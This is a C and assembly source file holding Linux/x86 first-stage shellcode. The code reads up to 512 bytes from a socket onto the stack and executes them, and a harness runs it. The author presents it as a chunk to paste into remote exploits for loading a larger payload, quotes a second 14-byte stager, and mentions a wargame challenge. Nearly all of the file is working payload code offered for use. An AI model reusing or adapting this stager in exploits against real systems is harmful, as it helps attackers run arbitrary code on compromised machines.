/* h3ll-core.c by Charles Stevenson <core@bokeoa.com> 
 *
 * I made this as a chunk you can paste in to make modular remote
 * exploits.  I use it as a first stage payload when I desire to
 * follow up with a real large payload of goodness.  This actually
 * is a bit larger than necessary because of the error checking but
 * in some cases prooves nice.  For a tiny version of the same theme
 * check out mcb's 14 byte (saving of 15 bytes for all you
 * mathematician's out there ;).  The only problem might be that his
 * reads from stdin and can only reads 385 bytes less than mine.  So
 * If you like to go big on the shellcode use mine... otherwise here's
 * mcb's (or comment out the delimited lines below to shrink mine):
 *
 * "\x6a\x03\x58\x31\xdb\x6a\x7f\x5a\x89\xe1\xcd\x80\xff\xe4"
 *
 * I assume the file descriptor is in %esi.  Since that's where it
 * was on the last exploit I wrote.  Change the instruction to
 * the appropriate register from your fndsckcode or put an int in
 * there for and fd that's always the same.
 */
char hellcode[] = /* if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core */
//  uncomment the following line to raise SIGTRAP in gdb
// "\xcc"                    // int3
//  22 bytes:
//  if (read(fd,buf,512) <= 0x2) _exit(1) else buf();
"\x31\xdb"                  // xor    %ebx,%ebx
"\xf7\xe3"                  // mul    %ebx
"\x42"                      // inc    %edx
"\xc1\xe2\x09"              // shl    $0x9,%edx
"\x31\xf3"                  // xor    %esi,%ebx // (optional assumes fd in esi)
"\x04\x03"                  // add    $0x3,%al
"\x54"                      // push   %esp
"\x59"                      // pop    %ecx
"\xcd\x80"                  // int    $0x80
"\x3c\x02"                  // cmp    $0x02,%al // (optional error check) 
"\x7e\x02"                  // jle    exit      // (optional exit clean) 
"\xff\xe1"                  // jmp    *%ecx
//  7 bytes _exit(1) (optional _exit(1);)
"\x31\xc0"                  // xor    %eax,%eax
"\x40"                      // inc    %eax
"\x89\xc3"                  // mov    %eax,%ebx
"\xcd\x80"                  // int    $0x80
;

int main(void)
{
  void (*shell)() = (void *)&hellcode;
  printf("%d byte if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core\n\tNOTE: w/optional 11 bytes check and exit (recommend unless no room)\n",
         strlen(hellcode));
  shell();
  return 0;
}

# h3ll.s by core@bokeoa.com based on some code zen-parse helped me to
# write a few years ago.. this is especially tuned for pulltheplug fu
# challenge #3 it read's 512 bytes of shellcode onto the stack and calls 
# it and i also implemented some error checking!

.globl main
main:
  int3      # SIGTRAP to gdb
  xor  %ebx,%ebx
  mul  %ebx
  inc  %edx    # 1 << 9 == 512 bytes
  shl  $0x9,%edx  #
  xor  %esi, %ebx  # fd stored in %esi
  add  $0x3,%al  # __NR_read
  push  %esp    # pointer to sp
  pop  %ecx    #  
  int  $0x80    # count = read(fd,buf,512)
  cmpb  $0x2, %al  # if (0x2 <= count)
  jle  exit    #   _exit(1)
  jmp  *%ecx    # else buf()
exit:
  xor %eax,%eax
  inc %eax
  mov %eax,%ebx
  int $0x80